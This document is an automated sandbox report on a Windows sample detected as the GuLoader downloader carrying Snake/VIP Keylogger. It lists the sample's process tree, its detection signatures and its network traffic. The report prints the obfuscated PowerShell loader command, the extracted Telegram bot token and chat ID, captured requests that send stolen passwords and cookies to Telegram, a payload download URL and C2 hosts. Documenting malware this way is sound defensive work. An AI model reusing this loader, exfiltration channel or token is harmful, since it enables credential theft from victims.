Edit tour

Windows Analysis Report
r5yYt97sfB.exe

Overview

General Information

Sample name:	r5yYt97sfB.exe renamed because original name is a hash value
Original sample name:	88a5fa91e12be14e5e37a237da70392dd9218f29ad88fa2cff8693ab4e215e81.exe
Analysis ID:	1587710
MD5:	831a8a58088361d324c958970b8ed79c
SHA1:	13366befe0af1ebb0665c81209dcab3388257cf0
SHA256:	88a5fa91e12be14e5e37a237da70392dd9218f29ad88fa2cff8693ab4e215e81
Tags:	exeuser-adrian__luca
Infos:

Detection

GuLoader, Snake Keylogger, VIP Keylogger

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Early bird code injection technique detected

Found malware configuration

Multi AV Scanner detection for dropped file

Multi AV Scanner detection for submitted file

Suricata IDS alerts for network traffic

Yara detected GuLoader

Yara detected Snake Keylogger

Yara detected Telegram RAT

Yara detected VIP Keylogger

AI detected suspicious sample

Found suspicious powershell code related to unpacking or dynamic code loading

Loading BitLocker PowerShell Module

Powershell drops PE file

Queues an APC in another process (thread injection)

Suspicious powershell command line found

Tries to detect the country of the analysis system (by using the IP)

Tries to harvest and steal browser information (history, passwords, etc)

Tries to steal Mail credentials (via file / registry access)

Uses the Telegram API (likely for C&C communication)

Writes to foreign memory regions

Abnormal high CPU Usage

Contains functionality for read data from the clipboard

Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Contains functionality to shutdown / reboot the system

Contains long sleeps (>= 3 min)

Creates a process in suspended mode (likely to inject code)

Creates files inside the system directory

Detected non-DNS traffic on DNS port

Detected potential crypto function

Drops PE files

Enables debug privileges

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Found dropped PE file which has not been started or loaded

Found inlined nop instructions (likely shell or obfuscated code)

HTTP GET or POST without a user agent

IP address seen in connection with other malware

JA3 SSL client fingerprint seen in connection with other malware

May check the online IP address of the machine

May sleep (evasive loops) to hinder dynamic analysis

PE / OLE file has an invalid certificate

Queries the volume information (name, serial number etc) of a device

Sample file is different than original file name gathered from version info

Sigma detected: Msiexec Initiated Connection

Sigma detected: Potential Binary Or Script Dropper Via PowerShell

Suricata IDS alerts with low severity for network traffic

Uses 32bit PE files

Uses a known web browser user agent for HTTP communication

Uses code obfuscation techniques (call, push, ret)

Uses insecure TLS / SSL version for HTTPS connection

Yara detected Credential Stealer

Classification

Process Tree

System is w10x64

r5yYt97sfB.exe (PID: 3452 cmdline: "C:\Users\user\Desktop\r5yYt97sfB.exe" MD5: 831A8A58088361D324C958970B8ED79C)

powershell.exe (PID: 4236 cmdline: powershell.exe -windowstyle hidden "$Forebrace7=gc -raw 'C:\Users\user\AppData\Local\magmaet\clenched\Dipterologist.Fra';$Afskalning=$Forebrace7.SubString(15810,3);.$Afskalning($Forebrace7) " MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)

conhost.exe (PID: 1412 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

msiexec.exe (PID: 7864 cmdline: "C:\Windows\SysWOW64\msiexec.exe" MD5: 9D09DC1EDA745A5F87553048E57620CF)

cleanup

Malware Threat Intel

Provided by

Name	Description	Attribution	Blogpost URLs	Link
CloudEyE, GuLoader	CloudEyE (initially named GuLoader) is a small VB5/6 downloader. It typically downloads RATs/Stealers, such as Agent Tesla, Arkei/Vidar, Formbook, Lokibot, Netwire and Remcos, often but not always from Google Drive. The downloaded payload is xored.	No Attribution	http://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/bluebottle-banks-targeted-africa https://0x00sec.org/t/analyzing-modern-malware-techniques-part-3/18943 https://any.run/cybersecurity-blog/deobfuscating-guloader/ https://asec.ahnlab.com/en/55978/ https://blog.checkpoint.com/security/march-2023s-most-wanted-malware-new-emotet-campaign-bypasses-microsoft-blocks-to-distribute-malicious-onenote-files/	https://malpedia.caad.fkie.fraunhofer.de/details/win.cloudeye

Name	Description	Attribution	Blogpost URLs	Link
404 Keylogger, Snake Keylogger	Snake Keylogger (aka 404 Keylogger) is a subscription-based keylogger that has many capabilities. The infostealer can steal a victims sensitive information, log keyboard strokes, take screenshots and extract information from the system clipboard. It was initially released on a Russian hacking forum in August 2019. It is notable for its relatively unusual methods of data exfiltration, including via email, FTP, SMTP, Pastebin or the messaging app Telegram.	No Attribution	https://any.run/cybersecurity-blog/analyzing-snake-keylogger/ https://any.run/cybersecurity-blog/reverse-engineering-snake-keylogger/ https://blog.netlab.360.com/purecrypter https://blog.nviso.eu/2022/04/06/analyzing-a-multilayer-maldoc-a-beginners-guide/ https://blogs.blackberry.com/en/2022/05/dot-net-stubs-sowing-the-seeds-of-discord	https://malpedia.caad.fkie.fraunhofer.de/details/win.404keylogger

Malware Configuration

Threatname: Telegram RAT

{"C2 url": "https://api.telegram.org/bot7888983233:AAGHDGX41oFk6oqVx8IC3EbSn56Cf9Te8YI/sendMessage"}

Threatname: Snake Keylogger

{"Exfil Mode": "Telegram", "Token": "7888983233:AAGHDGX41oFk6oqVx8IC3EbSn56Cf9Te8YI", "Chat_id": "8150022612", "Version": "4.4"}

Yara Signatures

Memory Dumps

Source	Rule	Description	Author
0000000B.00000002.3827428231.0000000025EEE000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_VIPKeylogger	Yara detected VIP Keylogger	Joe Security
0000000B.00000002.3827428231.0000000025EEE000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
0000000B.00000002.3827428231.0000000025D01000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_SnakeKeylogger	Yara detected Snake Keylogger	Joe Security
0000000B.00000002.3798575873.00000000043F8000.00000040.00000400.00020000.00000000.sdmp	JoeSecurity_GuLoader_2	Yara detected GuLoader	Joe Security
Process Memory Space: msiexec.exe PID: 7864	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
Process Memory Space: msiexec.exe PID: 7864	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
Click to see the 1 entries

Sigma Signatures

System Summary

Sigma detected: Msiexec Initiated Connection

Source: Network Connection

Author: frack113: Data: DestinationIp: 216.58.206.46, DestinationIsIpv6: false, DestinationPort: 443, EventID: 3, Image: C:\Windows\SysWOW64\msiexec.exe, Initiated: true, ProcessId: 7864, Protocol: tcp, SourceIp: 192.168.2.7, SourceIsIpv6: false, SourcePort: 59370

Sigma detected: Potential Binary Or Script Dropper Via PowerShell

Source: File created

Author: frack113, Nasreddine Bencherchali (Nextron Systems): Data: EventID: 11, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 4236, TargetFilename: C:\Users\user\AppData\Local\magmaet\clenched\Gruppekonto\r5yYt97sfB.exe

Sigma detected: Non Interactive PowerShell Process Spawned

Source: Process started

Author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: powershell.exe -windowstyle hidden "$Forebrace7=gc -raw 'C:\Users\user\AppData\Local\magmaet\clenched\Dipterologist.Fra';$Afskalning=$Forebrace7.SubString(15810,3);.$Afskalning($Forebrace7) ", CommandLine: powershell.exe -windowstyle hidden "$Forebrace7=gc -raw 'C:\Users\user\AppData\Local\magmaet\clenched\Dipterologist.Fra';$Afskalning=$Forebrace7.SubString(15810,3);.$Afskalning($Forebrace7) ", CommandLine|base64offset|contains: v,)^, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\r5yYt97sfB.exe", ParentImage: C:\Users\user\Desktop\r5yYt97sfB.exe, ParentProcessId: 3452, ParentProcessName: r5yYt97sfB.exe, ProcessCommandLine: powershell.exe -windowstyle hidden "$Forebrace7=gc -raw 'C:\Users\user\AppData\Local\magmaet\clenched\Dipterologist.Fra';$Afskalning=$Forebrace7.SubString(15810,3);.$Afskalning($Forebrace7) ", ProcessId: 4236, ProcessName: powershell.exe

Suricata Signatures

ETPRO MALWARE Common Downloader Header Pattern H

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-01-10T17:17:33.553402+0100	2803305	3	Unknown Traffic	192.168.2.7	59374	104.21.80.1	443	TCP
2025-01-10T17:17:36.573806+0100	2803305	3	Unknown Traffic	192.168.2.7	59378	104.21.80.1	443	TCP
2025-01-10T17:17:40.018419+0100	2803305	3	Unknown Traffic	192.168.2.7	59382	104.21.80.1	443	TCP
2025-01-10T17:17:42.933167+0100	2803305	3	Unknown Traffic	192.168.2.7	59386	104.21.80.1	443	TCP

ETPRO MALWARE Common Downloader Header Pattern UH

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-01-10T17:17:31.679110+0100	2803274	2	Potentially Bad Traffic	192.168.2.7	59372	132.226.8.169	80	TCP
2025-01-10T17:17:32.976159+0100	2803274	2	Potentially Bad Traffic	192.168.2.7	59372	132.226.8.169	80	TCP
2025-01-10T17:17:34.444924+0100	2803274	2	Potentially Bad Traffic	192.168.2.7	59375	132.226.8.169	80	TCP

ETPRO MALWARE Common Downloader Header Pattern UHCa

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-01-10T17:17:26.605893+0100	2803270	2	Potentially Bad Traffic	192.168.2.7	59370	216.58.206.46	443	TCP

Joe Security ANOMALY Telegram Send File

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-01-10T17:17:52.314903+0100	1810008	1	Potentially Bad Traffic	192.168.2.7	59390	149.154.167.220	443	TCP
2025-01-10T17:17:54.940923+0100	1810008	1	Potentially Bad Traffic	192.168.2.7	59391	149.154.167.220	443	TCP

Joe Security ANOMALY Telegram Send Message

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-01-10T17:17:45.508646+0100	1810007	1	Potentially Bad Traffic	192.168.2.7	59389	149.154.167.220	443	TCP

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Found malware configuration

Source: 0000000B.00000002.3827428231.0000000025D01000.00000004.00000800.00020000.00000000.sdmp	Malware Configuration Extractor: Snake Keylogger {"Exfil Mode": "Telegram", "Token": "7888983233:AAGHDGX41oFk6oqVx8IC3EbSn56Cf9Te8YI", "Chat_id": "8150022612", "Version": "4.4"}
Source: msiexec.exe.7864.11.memstrmin	Malware Configuration Extractor: Telegram RAT {"C2 url": "https://api.telegram.org/bot7888983233:AAGHDGX41oFk6oqVx8IC3EbSn56Cf9Te8YI/sendMessage"}

Multi AV Scanner detection for dropped file

Source: C:\Users\user\AppData\Local\magmaet\clenched\Gruppekonto\r5yYt97sfB.exe

ReversingLabs: Detection: 55%

Multi AV Scanner detection for submitted file

Source: r5yYt97sfB.exe	Virustotal: Detection: 71%			Perma Link
Source: r5yYt97sfB.exe	ReversingLabs: Detection: 55%

AI detected suspicious sample

Source: Submited Sample

Integrated Neural Analysis Model: Matched 98.8% probability

Location Tracking

Tries to detect the country of the analysis system (by using the IP)

Source: unknown

DNS query: name: reallyfreegeoip.org

Source: r5yYt97sfB.exe

Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE

Source: unknown

HTTPS traffic detected: 104.21.80.1:443 -> 192.168.2.7:59373 version: TLS 1.0

Source: unknown	HTTPS traffic detected: 216.58.206.46:443 -> 192.168.2.7:59370 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 142.250.186.129:443 -> 192.168.2.7:59371 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.7:59389 version: TLS 1.2

Source: r5yYt97sfB.exe

Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

Source: C:\Users\user\Desktop\r5yYt97sfB.exe	Code function: 1_2_00405974 CloseHandle,GetTempPathW,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,	1_2_00405974
Source: C:\Users\user\Desktop\r5yYt97sfB.exe	Code function: 1_2_004064C6 FindFirstFileW,FindClose,	1_2_004064C6
Source: C:\Users\user\Desktop\r5yYt97sfB.exe	Code function: 1_2_004027FB FindFirstFileW,	1_2_004027FB

Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 4x nop then jmp 02DFF45Dh	11_2_02DFF2C0
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 4x nop then jmp 02DFF45Dh	11_2_02DFF4AC
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 4x nop then jmp 02DFFC19h	11_2_02DFF974

Networking

Suricata IDS alerts for network traffic

Source: Network traffic	Suricata IDS: 1810008 - Severity 1 - Joe Security ANOMALY Telegram Send File : 192.168.2.7:59390 -> 149.154.167.220:443
Source: Network traffic	Suricata IDS: 1810007 - Severity 1 - Joe Security ANOMALY Telegram Send Message : 192.168.2.7:59389 -> 149.154.167.220:443
Source: Network traffic	Suricata IDS: 1810008 - Severity 1 - Joe Security ANOMALY Telegram Send File : 192.168.2.7:59391 -> 149.154.167.220:443

Uses the Telegram API (likely for C&C communication)

Source: unknown

DNS query: name: api.telegram.org

Source: global traffic

TCP traffic: 192.168.2.7:59308 -> 162.159.36.2:53

Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:390120%0D%0ADate%20and%20Time:%2011/01/2025%20/%2000:31:01%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20390120%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D HTTP/1.1Host: api.telegram.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /bot7888983233:AAGHDGX41oFk6oqVx8IC3EbSn56Cf9Te8YI/sendDocument?chat_id=8150022612&caption=%20Pc%20Name:%20user%20%7C%20/%20VIP%20Recovery%20%5C%0D%0A%0D%0APW%20%7C%20user%20%7C%20VIP%20Recovery HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8dd32380b8cca17Host: api.telegram.orgContent-Length: 585
Source: global traffic	HTTP traffic detected: POST /bot7888983233:AAGHDGX41oFk6oqVx8IC3EbSn56Cf9Te8YI/sendDocument?chat_id=8150022612&caption=%20Pc%20Name:%20user%20%7C%20/%20VIP%20Recovery%20%5C%0D%0A%0D%0ACookies%20%7C%20user%20%7C%20VIP%20Recovery HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8dd3255c2e76ef6Host: api.telegram.orgContent-Length: 1282

Source: Joe Sandbox View	IP Address: 132.226.8.169 132.226.8.169
Source: Joe Sandbox View	IP Address: 149.154.167.220 149.154.167.220

Source: Joe Sandbox View	JA3 fingerprint: 54328bd36c14bd82ddaa0c04b25ed9ad
Source: Joe Sandbox View	JA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
Source: Joe Sandbox View	JA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19

Source: unknown	DNS query: name: checkip.dyndns.org
Source: unknown	DNS query: name: reallyfreegeoip.org

Source: Network traffic	Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.7:59375 -> 132.226.8.169:80
Source: Network traffic	Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.7:59372 -> 132.226.8.169:80
Source: Network traffic	Suricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.7:59370 -> 216.58.206.46:443
Source: Network traffic	Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.7:59374 -> 104.21.80.1:443
Source: Network traffic	Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.7:59386 -> 104.21.80.1:443
Source: Network traffic	Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.7:59382 -> 104.21.80.1:443
Source: Network traffic	Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.7:59378 -> 104.21.80.1:443

Source: global traffic	HTTP traffic detected: GET /uc?export=download&id=1Rl2Q3jifSIE7VULdNBFwLR_HP9yjBG3k HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: drive.google.comCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /download?id=1Rl2Q3jifSIE7VULdNBFwLR_HP9yjBG3k&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive

Source: unknown

HTTPS traffic detected: 104.21.80.1:443 -> 192.168.2.7:59373 version: TLS 1.0

Source: unknown	TCP traffic detected without corresponding DNS query: 162.159.36.2
Source: unknown	TCP traffic detected without corresponding DNS query: 162.159.36.2
Source: unknown	TCP traffic detected without corresponding DNS query: 162.159.36.2
Source: unknown	TCP traffic detected without corresponding DNS query: 162.159.36.2
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1

Source: global traffic	HTTP traffic detected: GET /uc?export=download&id=1Rl2Q3jifSIE7VULdNBFwLR_HP9yjBG3k HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: drive.google.comCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /download?id=1Rl2Q3jifSIE7VULdNBFwLR_HP9yjBG3k&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:390120%0D%0ADate%20and%20Time:%2011/01/2025%20/%2000:31:01%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20390120%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D HTTP/1.1Host: api.telegram.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive

Source: global traffic	DNS traffic detected: DNS query: drive.google.com
Source: global traffic	DNS traffic detected: DNS query: drive.usercontent.google.com
Source: global traffic	DNS traffic detected: DNS query: checkip.dyndns.org
Source: global traffic	DNS traffic detected: DNS query: reallyfreegeoip.org
Source: global traffic	DNS traffic detected: DNS query: api.telegram.org

Source: unknown

HTTP traffic detected: POST /bot7888983233:AAGHDGX41oFk6oqVx8IC3EbSn56Cf9Te8YI/sendDocument?chat_id=8150022612&caption=%20Pc%20Name:%20user%20%7C%20/%20VIP%20Recovery%20%5C%0D%0A%0D%0APW%20%7C%20user%20%7C%20VIP%20Recovery HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8dd32380b8cca17Host: api.telegram.orgContent-Length: 585

Source: global traffic

HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0Date: Fri, 10 Jan 2025 16:17:45 GMTContent-Type: application/jsonContent-Length: 55Connection: closeStrict-Transport-Security: max-age=31536000; includeSubDomains; preloadAccess-Control-Allow-Origin: *Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection

Source: msiexec.exe, 0000000B.00000002.3827428231.0000000025EEE000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://51.38.247.67:8081/_send_.php?L
Source: msiexec.exe, 0000000B.00000002.3827428231.0000000025D01000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://aborters.duckdns.org:8081
Source: msiexec.exe, 0000000B.00000002.3827428231.0000000025D01000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://anotherarmy.dns.army:8081
Source: msiexec.exe, 0000000B.00000002.3827428231.0000000025F02000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 0000000B.00000002.3827428231.0000000025EEE000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://api.telegram.org
Source: msiexec.exe, 0000000B.00000002.3827428231.0000000025D01000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://checkip.dyndns.org
Source: msiexec.exe, 0000000B.00000002.3827428231.0000000025D01000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://checkip.dyndns.org/
Source: r5yYt97sfB.exe, r5yYt97sfB.exe.5.dr	String found in binary or memory: http://nsis.sf.net/NSIS_ErrorError
Source: msiexec.exe, 0000000B.00000002.3827428231.0000000025D01000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: msiexec.exe, 0000000B.00000002.3827428231.0000000025D01000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://varders.kozow.com:8081
Source: msiexec.exe, 0000000B.00000002.3828910007.0000000027011000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 0000000B.00000002.3828910007.0000000026D21000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://ac.ecosia.org/autocomplete?q=
Source: msiexec.exe, 0000000B.00000002.3827428231.0000000025F02000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 0000000B.00000002.3827428231.0000000025EEE000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 0000000B.00000002.3827428231.0000000025DE2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://api.telegram.org
Source: msiexec.exe, 0000000B.00000002.3827428231.0000000025EEE000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 0000000B.00000002.3827428231.0000000025DE2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://api.telegram.org/bot
Source: msiexec.exe, 0000000B.00000002.3827428231.0000000025DE2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://api.telegram.org/bot/sendMessage?chat_id=&text=
Source: msiexec.exe, 0000000B.00000002.3827428231.0000000025DE2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://api.telegram.org/bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:390120%0D%0ADate%20a
Source: msiexec.exe, 0000000B.00000002.3827428231.0000000025EEE000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://api.telegram.org/bot7888983233:AAGHDGX41oFk6oqVx8IC3EbSn56Cf9Te8YI/sendDocument?chat_id=8150
Source: msiexec.exe, 0000000B.00000003.2652184692.000000000A19C000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 0000000B.00000003.2652094737.000000000A19C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://apis.google.com
